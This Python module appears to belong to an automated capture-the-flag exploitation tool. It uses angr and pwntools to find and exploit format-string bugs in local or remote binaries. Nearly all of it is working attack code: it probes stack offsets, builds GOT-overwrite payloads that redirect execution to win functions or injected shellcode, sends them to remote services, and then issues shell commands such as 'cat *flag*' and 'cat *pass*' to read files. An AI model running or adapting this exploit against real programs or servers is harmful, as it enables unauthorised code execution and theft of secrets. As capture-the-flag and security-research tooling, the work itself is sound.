from __future__ import print_function
from __future__ import absolute_import
import angr
from pwn import *
from .formatDetector import printFormat
from .overflowExploiter import getShellcode,getRegValues,findShellcode
import timeout_decorator
import time
import string


def exploitFormat(binary_name,properties):
    '''
    Exploit a format-string bug in a local binary.

    1. Find the printf argument index that reflects the start of our buffer
       by sending "aaaa_%<i>$08x_" for i in 1..49 and looking for "61616161"
       (the hex of "aaaa") among the leaked values.
    2. If win functions are known, overwrite each GOT entry with each win
       function's address and test every payload.
    3. Otherwise, if NX is disabled, hand off to rediscoverAndExploit to point
       a GOT entry at shellcode.

    :param binary_name: path to the local binary.
    :param properties: analysis dict. Reads 'pwn_type' ('position', 'length',
        'input'), 'input_type', 'win_functions' and 'protections' ('got', 'nx').
    :returns: dict with 'flag_found' (bool) and, when a win-function payload
        produced the flag, 'input' (that payload).
    '''
    exploit_results = {}
    exploit_results['flag_found'] = False

    input_pos = properties['pwn_type']['position']
    input_len = properties['pwn_type']['length']
    input_string = properties['pwn_type']['input']

    #Slice controlled input out of the known triggering input
    start_slice = input_string[:input_pos]
    end_slice = input_string[input_pos+input_len:]

    stack_position = -1
    print("[~] Locating buffer stack location")
    #Determine stack location
    for i in range(1, 50):
        iter_string = "aaaa_%{}$08x_".format(i)
        iter_string = assembleInput(iter_string,start_slice,end_slice,input_len)

        results = runIteration(binary_name,iter_string,input_type=properties['input_type'])
        if "61616161" in results: # 0x61616161 == "aaaa"
            stack_position = i
            print("[+] Found stack location at {}".format(stack_position))
            break

    if stack_position == -1:
        # Every payload built from offset -1 would be garbage; don't bother sending them.
        print("[-] Unable to locate buffer stack location")
        return exploit_results

    # Truthiness check handles both None and an empty collection.
    if properties['win_functions']:
        for func in properties['win_functions']:
            address = properties['win_functions'][func]['fcn_addr']
            for got_name,got_addr in properties['protections']['got'].items():
                print("[~] Overwritting {}".format(got_name))
                writes = {got_addr:address}
                format_payload = fmtstr_payload(stack_position, writes, numbwritten=input_pos)
                if len(format_payload) > input_len:
                    # Fall back to 2-byte writes, which take less room than the default.
                    print("[~] Format input to large, shrinking")
                    format_payload = fmtstr_payload(stack_position, writes, numbwritten=input_pos, write_size='short')

                format_input = assembleInput(format_payload,start_slice,end_slice,input_len)

                print(repr(format_input))
                results = sendExploit(binary_name,properties,format_input)
                if results['flag_found']:
                    exploit_results['flag_found'] = results['flag_found']
                    exploit_results['input'] = format_input
                    return exploit_results
    elif not properties['protections']['nx']:
        print("[+] Binary does not have NX")
        print("[+] Overwriting GOT entry to point to shellcode")
        # NOTE(review): the rediscovery result is not folded into exploit_results.
        rediscoverAndExploit(binary_name,properties,stack_position)
    else:
        # TODO: one-gadget RCE is not implemented; nothing is attempted here.
        print("[+] Overwriting GOT entry to point to one gadget RCE")

    return exploit_results

def rediscoverAndExploit(binary_name,properties,stack_position):
    '''
    Re-run the binary under angr and exploit the format string from the hooked printf.

    Run until we hit our hooked printf (printFormatSploit), which constrains
    the input to a crafted string:
        String = (Format GOT Write) + (Shellcode)

    :param binary_name: path to the binary to load into angr.
    :param properties: analysis dict. 'shellcode' and 'stack_position' are
        added to it here so printFormatSploit can read them from state.globals.
    :param stack_position: printf argument index that reflects our buffer.
    :returns: dict with 'type' (None unless a state was found). When a state
        was found it also has 'position' and 'length'. For STDIN, LIBPWNABLE
        or ARG input it also has 'input', the concrete triggering input.
    '''
    import claripy  # needed for the symbolic argv[1]; not imported at module level

    properties['shellcode'] = getShellcode(properties)
    properties['stack_position'] = stack_position
    inputType = properties['input_type']

    #p = angr.Project(binary_name,load_options={"auto_load_libs": False})
    p = angr.Project(binary_name)

    # Every printf call goes through printFormatSploit, which builds and tests the exploit
    p.hook_symbol('printf',printFormatSploit)

    #Setup state based on input type
    argv = [binary_name]
    arg = None
    if inputType == "STDIN":
        # angr doesn't use the right base and stack pointers when loading the
        # binary, so our addresses are all wrong. Grab them manually.
        entryAddr = p.loader.main_object.entry
        reg_values = getRegValues(binary_name,entryAddr)
        state = p.factory.full_init_state(args=argv)

        for register in state.arch.register_names.values():
            if register in reg_values: # only registers getRegValues reported
                state.registers.store(register,reg_values[register])

    elif inputType == "LIBPWNABLE":
        handle_connection = p.loader.main_object.get_symbol('handle_connection')
        state = p.factory.entry_state(addr=handle_connection.rebased_addr)
    else:
        arg = claripy.BVS("arg1", 300 * 8)
        argv.append(arg)
        state = p.factory.full_init_state(args=argv)
        state.globals['arg'] = arg

    state.globals['inputType'] = inputType
    state.globals['properties'] = properties
    simgr = p.factory.simgr(state, immutable=False)

    run_environ = {}
    run_environ['type'] = None
    end_state = None
    #Lame way to do a timeout
    try:
        @timeout_decorator.timeout(1200)
        def exploreBinary(simgr):
            # printFormatSploit sets 'type' in globals once it has an exploit
            simgr.explore(find=lambda s: 'type' in s.globals)

        exploreBinary(simgr)
        if 'found' in simgr.stashes and len(simgr.found):
            end_state = simgr.found[0]
            run_environ['type'] = end_state.globals['type']
            run_environ['position'] = end_state.globals['position']
            run_environ['length'] = end_state.globals['length']

    except (KeyboardInterrupt, timeout_decorator.TimeoutError):
        print("[~] Format check timed out")

    if (inputType == "STDIN" or inputType == "LIBPWNABLE") and end_state is not None:
        stdin_str = str(end_state.posix.dumps(0))
        print("[+] Triggerable with STDIN : {}".format(stdin_str))
        run_environ['input'] = stdin_str
    elif inputType == "ARG" and end_state is not None:
        arg_str = str(end_state.solver.eval(arg,cast_to=str))
        run_environ['input'] = arg_str
        print("[+] Triggerable with arg : {}".format(arg_str))

    return run_environ

class printFormatSploit(angr.procedures.libc.printf.printf):
    '''
    angr printf replacement that tries to exploit a format-string bug.

    When the hooked printf runs, checkExploitable() looks for
    attacker-controlled (symbolic) bytes behind the first five printf
    arguments. It constrains them to a GOT-overwrite format string followed
    by shellcode, then tests the resulting input against the real binary via
    sendExploit. On success it records 'type', 'position' and 'length' in
    self.state.globals; otherwise the normal printf model runs.

    Reads from state.globals:
      - 'properties', which needs 'shellcode', 'stack_position',
        'protections'['got'] and 'input_type';
      - 'inputType';
      - 'arg', for ARG inputs.
    '''
    IS_FUNCTION = True

    def checkExploitable(self):
        '''
        Check whether any printf argument points at symbolic bytes we control,
        and if so try to build a working exploit from it.

        :returns: True once an exploit has been recorded in self.state.globals,
            False if none of the arguments worked.
        '''
        for i in range(5):

            if 'properties' not in self.state.globals:
                print("[-] Missing properties in globals!")
                exit(0)

            properties = self.state.globals['properties']

            state_copy = self.state.copy()

            solv = state_copy.solver.eval

            printf_arg = self.arg(i)

            var_loc = solv(printf_arg) #Assume it's a pointer

            if var_loc == 0:
                print("[-] Value at stack offset {} not a pointer".format(i))
                continue

            var_value = state_copy.memory.load(var_loc)

            # NOTE(review): var_value.length is a bit count. Formatting it in
            # decimal and re-parsing it as hex does not give a byte count.
            # Kept unchanged because it only bounds how far the scan below reads.
            var_value_length = int("0x"+str(var_value.length),16)

            symbolic_list = [state_copy.memory.load(var_loc + x).get_byte(0).symbolic for x in range(var_value_length)]

            # Find where our symbolic bytes are inside the pointed-to string.
            # This covers controlled input appended to a constant prefix, e.g.:
            #
            #   char myVal[100] = "I'm cool ";
            #   strcat(myVal,STDIN);
            #   printf("My super cool string is %s",myVal);
            position, greatest_count = self._longestSymbolicRun(symbolic_list)
            print("[+] Found symbolic buffer at position {} of length {}".format(position,greatest_count))

            if greatest_count <= 0:
                continue

            shellcode = properties['shellcode']
            stack_pos = properties['stack_position']

            for got_name,got_addr in properties['protections']['got'].items():
                backup_state = state_copy.copy()
                print("[+] Overwiting {} at {}".format(got_name,hex(got_addr)))

                solv = state_copy.solver.eval

                #Mock write to get the approximate length of the format string
                buffer_address = var_loc + position
                writes = {got_addr:buffer_address} #Beginning of buffer
                format_write = fmtstr_payload(stack_pos, writes, numbwritten=position, write_size='short')
                write_len = len(format_write)

                #Real write: point the GOT entry just past the format string,
                #where the shellcode is placed
                buffer_address = var_loc + position + write_len
                writes = {got_addr:buffer_address}
                format_write = fmtstr_payload(stack_pos, writes, numbwritten=position, write_size='short')

                #Final payload
                format_payload = format_write + shellcode

                var_value_length = len(format_payload)
                self.constrainBytes(state_copy,var_value,var_loc,position,var_value_length,strVal=format_payload)

                print("[+] Format buffer at {}".format(hex(var_loc)))
                print("[+] Shellcode located at {}".format(hex(buffer_address)))
                print("[+] Format write:\n{}".format(repr(format_write)))
                print("[+] Constructed payload:\n{}".format(repr(format_payload)))
                print("[+] Constructed stdout:\n{}".format(repr(state_copy.posix.dumps(0).rstrip('\x00'))))

                vuln_string = solv(var_value, cast_to=str)

                binary_name = state_copy.project.filename
                print('[~] Testing payload')
                # NOTE(review): the concrete stdin is sent even for ARG inputs; confirm intended.
                results = sendExploit(binary_name,properties,state_copy.posix.dumps(0))

                if not results['flag_found']: #Maybe angr still messed up the pointer
                    print('[-] Payload launch failed. Fixing angr stack pointer')

                    first_input = state_copy.posix.dumps(0).rstrip('\x00')

                    #Find the last basic block executed
                    last_bb = [x for x in state_copy.trace if 'IRSB' in x][-1]
                    last_bb_addr = int(last_bb.split(' ')[2].rstrip(':'),16) #I'm sorry I'm parsing like this

                    ret_location = findShellcode(binary_name,last_bb_addr,shellcode,first_input)

                    if len(ret_location) == 0:
                        print("[-] Unable to find shellcode location for corrected stack")
                    else:
                        real_location = ret_location[0]['offset']

                        # Rebuild the payload on an unconstrained copy, aimed at the real location
                        state_copy = backup_state.copy()

                        solv = state_copy.solver.eval

                        printf_arg = self.arg(i)

                        var_loc = solv(printf_arg) #Assume it's a pointer

                        if var_loc == 0:
                            print("[-] Value at stack offset {} not a pointer".format(i))
                            continue

                        var_value = state_copy.memory.load(var_loc)

                        writes = {got_addr:real_location}
                        format_write = fmtstr_payload(stack_pos, writes, numbwritten=position, write_size='short')
                        format_payload = format_write + properties['shellcode']
                        var_value_length = len(format_payload)
                        self.constrainBytes(state_copy,var_value,var_loc,position,var_value_length,strVal=format_payload)

                        print("[+] Shellcode located at {}".format(hex(real_location)))
                        print("[+] Adjusted payload:\n{}".format(repr(format_payload)))
                        print("[+] Constructed stdout:\n{}".format(repr(state_copy.posix.dumps(0).rstrip('\x00'))))

                        with open('command.input','w') as f:
                            f.write(state_copy.posix.dumps(0).rstrip('\x00'))

                        results_n = sendExploit(binary_name,properties,state_copy.posix.dumps(0).rstrip('\x00'))
                        if results_n['flag_found']:
                            print("[+] Vulnerable path found {}".format(repr(state_copy.posix.dumps(0).rstrip('\x00'))))
                            self._markExploited(position, greatest_count)
                            return True

                #Verify solution
                input_type = state_copy.globals['inputType']
                if input_type in ("STDIN", "LIBPWNABLE") and results['flag_found']:
                    # First payload worked: apply the same constraints to the live state
                    var_value = self.state.memory.load(var_loc)
                    self.constrainBytes(self.state,var_value,var_loc,position,var_value_length,strVal=format_payload)
                    print("[+] Vulnerable path found {}".format(vuln_string))
                    self._markExploited(position, greatest_count)
                    return True
                if input_type == "ARG":
                    arg = state_copy.globals['arg']
                    arg_str = str(state_copy.solver.eval(arg,cast_to=str))
                    if format_payload in arg_str:
                        var_value = self.state.memory.load(var_loc)
                        self.constrainBytes(self.state,var_value,var_loc,position,var_value_length,strVal=format_payload)
                        print("[+] Vulnerable path found {}".format(vuln_string))
                        self._markExploited(position, greatest_count)
                        return True
                state_copy = backup_state.copy()

        return False

    @staticmethod
    def _longestSymbolicRun(symbolic_list):
        '''
        Find the first longest run of consecutive True entries in symbolic_list.

        :returns: (position, count). position is the index where the run
            starts, and count is the run length minus one (the number of
            symbolic bytes after the first). Returns (0, 0) when no two
            adjacent entries are True.
        '''
        position = 0
        count = 0
        greatest_count = 0
        for idx in range(1, len(symbolic_list)):
            if symbolic_list[idx] and symbolic_list[idx - 1]:
                count += 1
                if count > greatest_count:
                    greatest_count = count
                    position = idx - count
            else:
                count = 0
        return position, greatest_count

    def _markExploited(self, position, length):
        '''Record a successful format exploit in self.state.globals.'''
        self.state.globals['type'] = "Format"
        self.state.globals['position'] = position
        self.state.globals['length'] = length

    def constrainBytes(self, state, symVar, loc,position, length, strVal="%x_"):
        '''
        Constrain `length` bytes of `state`'s memory, starting at loc + position,
        to repeat strVal.

        A byte whose constraint would make the state unsatisfiable is left
        unconstrained and reported. symVar is unused; it is kept for
        interface compatibility.
        '''
        for i in range(length):
            strValIndex = i % len(strVal)
            curr_byte = state.memory.load(loc + position + i).get_byte(0)
            constraint = state.solver.And(strVal[strValIndex] == curr_byte)
            if state.solver.satisfiable(extra_constraints=[constraint]):
                state.add_constraints(constraint)
            else:
                print("[~] Byte {} not constrained to {}".format(i,repr(strVal[strValIndex])))

    def run(self):
        # Fall back to the normal printf model when no exploit was built
        if not self.checkExploitable():
            return super(printFormatSploit, self).run()


def getRemoteFormat(properties,remote_url,remote_port):
    '''
    Exploit a format-string bug on a remote service using known win functions.

    Locates the buffer's printf argument index by sending "AAAA_%<i>$08x_"
    for i in 1..49 and looking for "41414141" (the hex of "AAAA"). It then
    overwrites each GOT entry with each win function's address and sends
    every payload to remote_url:remote_port.

    :param properties: analysis dict. Reads 'pwn_type' ('position', 'length',
        'input'), 'input_type', 'win_functions' and 'protections' ('got').
    :returns: dict with 'flag_found' (bool) and, on success, 'input' (the
        payload that produced the flag).
    '''
    exploit_results = {}
    exploit_results['flag_found'] = False

    input_pos = properties['pwn_type']['position']
    input_len = properties['pwn_type']['length']
    input_string = properties['pwn_type']['input']

    #Slice controlled input out of the known triggering input
    start_slice = input_string[:input_pos]
    end_slice = input_string[input_pos+input_len:]

    stack_position = -1
    print("[~] Locating buffer stack location")
    #Determine stack location
    for i in range(1, 50):
        iter_string = "AAAA_%{}$08x_".format(i)
        iter_string = assembleInput(iter_string,start_slice,end_slice,input_len)

        results = runIteration(None,iter_string,remote_server=True,remote_url=remote_url,remote_port=remote_port)
        if "41414141" in results: # 0x41414141 == "AAAA"
            stack_position = i
            print("[+] Found stack location at {}".format(stack_position))
            break

    if stack_position == -1:
        # Every payload built from offset -1 would be garbage; don't bother sending them.
        print("[-] Unable to locate buffer stack location")
        return exploit_results

    # Truthiness check handles both None and an empty collection.
    if properties['win_functions']:
        for func in properties['win_functions']:
            address = properties['win_functions'][func]['fcn_addr']
            for got_name,got_addr in properties['protections']['got'].items():
                print("[~] Overwritting {}".format(got_name))
                writes = {got_addr:address}
                format_payload = fmtstr_payload(stack_position, writes, numbwritten=input_pos)
                if len(format_payload) > input_len:
                    # Fall back to 2-byte writes, which take less room than the default.
                    print("[~] Format input to large, shrinking")
                    format_payload = fmtstr_payload(stack_position, writes, numbwritten=input_pos, write_size='short')

                format_input = assembleInput(format_payload,start_slice,end_slice,input_len)

                print(repr(format_input))
                results = sendExploit(None,properties,format_input,remote_server=True,remote_url=remote_url,port_num=remote_port)
                if results['flag_found']:
                    exploit_results['flag_found'] = results['flag_found']
                    exploit_results['input'] = format_input
                    return exploit_results

    return exploit_results



def assembleInput(str_input,start_slice,end_slice,input_len,pad_char="A"):
    '''
    Splice str_input between start_slice and end_slice, keeping the original input size.

    str_input is right-padded with pad_char up to input_len. Input that is
    already input_len or longer is used as-is; it is never truncated.

    TODO: use angr instead and add these as constraints off a path.
    '''
    pad_len = input_len - len(str_input)
    # Only concatenate when padding is needed, so bytes inputs still work unpadded.
    if pad_len > 0:
        str_input = str_input + pad_char * pad_len
    return start_slice + str_input + end_slice

def runIteration(binary_name,str_input,remote_server=False,remote_url="",remote_port=0,input_type="STDIN"):
    '''
    Run the target once with str_input and return the hex-looking leaks.

    For STDIN/LIBPWNABLE input, the payload is sent as a line to a local
    process, or to remote_url:remote_port when remote_server is set. For any
    other input type, it is passed as argv[1] (trailing NULs stripped) to a
    local process.

    :returns: list of the '_'-separated output pieces that are at most 8
        characters long and contain only hex digits. The list may include
        empty strings. Callers test membership, e.g. "61616161" in result.
    '''
    uses_stdin = input_type == "STDIN" or input_type == "LIBPWNABLE"
    if uses_stdin:
        if remote_server:
            proc = remote(remote_url,remote_port)
        else:
            proc = process(binary_name)
    else:
        proc = process([binary_name,str_input.rstrip('\x00')])

    try:
        if uses_stdin:
            proc.sendline(str_input)
        results = proc.recvall(timeout=5)
    finally:
        # recvall can return on timeout with the target still running
        proc.close()
    print(results)

    #Get only hex strings of 8 characters or fewer
    return [x for x in results.split('_') if len(x) < 9 and all(y in string.hexdigits for y in x)]

def _containsFlag(output):
    '''Heuristic flag check: True when output contains both '{' and '}'.'''
    return '{' in output and '}' in output


def _launchTarget(binary_name,input_string,uses_stdin,remote_server,remote_url,port_num):
    '''Start the target and deliver input_string; return the tube, or None if an argv launch failed.'''
    if uses_stdin:
        if remote_server:
            proc = remote(remote_url,port_num)
        else:
            proc = process(binary_name)
        proc.sendline(input_string)
        return proc
    try:
        return process([binary_name,input_string])
    except Exception:
        # The payload could not be passed as argv (e.g. it contains NUL bytes)
        print("[-] Issue with nulls in arg")
        return None


def sendExploit(binary_name,properties,input_string,remote_server=False,remote_url="",port_num=0):
    '''
    Launch the target with input_string and report whether a flag was seen.

    Up to two attempts are made:
      1. Send the payload and look for a flag printed directly to stdout.
      2. Otherwise, re-launch, send the payload again, then send shell
         commands ("ls", "cat *flag*", "cat *pass*"), assuming the payload
         spawned a shell, and look for a flag in the combined output.

    :param binary_name: local binary path (unused for a remote STDIN target).
    :param properties: analysis dict; only properties['input_type'] is read.
        STDIN/LIBPWNABLE sends the payload as a line; anything else passes it
        as argv[1].
    :param remote_server: connect to remote_url:port_num instead of running locally.
    :returns: dict with key 'flag_found' (bool).
    '''
    send_results = {}
    send_results['flag_found'] = False
    uses_stdin = properties['input_type'] == "STDIN" or properties['input_type'] == "LIBPWNABLE"

    #Sometimes the flag is just printed
    proc = _launchTarget(binary_name,input_string,uses_stdin,remote_server,remote_url,port_num)
    if proc is not None:
        try:
            results = proc.recvall(timeout=15)
        finally:
            proc.close()
        if _containsFlag(results):
            send_results['flag_found'] = True
            print("[+] Flag found:")
            print(results.replace('\x20\x20',''))
            return send_results

    #Flag not in stdout, we have a shell
    proc = _launchTarget(binary_name,input_string,uses_stdin,remote_server,remote_url,port_num)
    if proc is None:
        return send_results
    try:
        proc.sendline()
        proc.sendline("ls;\n")
        proc.sendline("cat *flag*;\n")
        proc.sendline("cat *pass*;\n")
        command_results = proc.recvall(timeout=30) #Need a better way to "time out"
        if _containsFlag(command_results):
            send_results['flag_found'] = True
            print("[+] Flag found:")
            print(command_results.replace('\x20\x20',''))
    except Exception:
        # Best effort: the target may already have exited or closed the pipe.
        pass
    finally:
        proc.close()

    return send_results
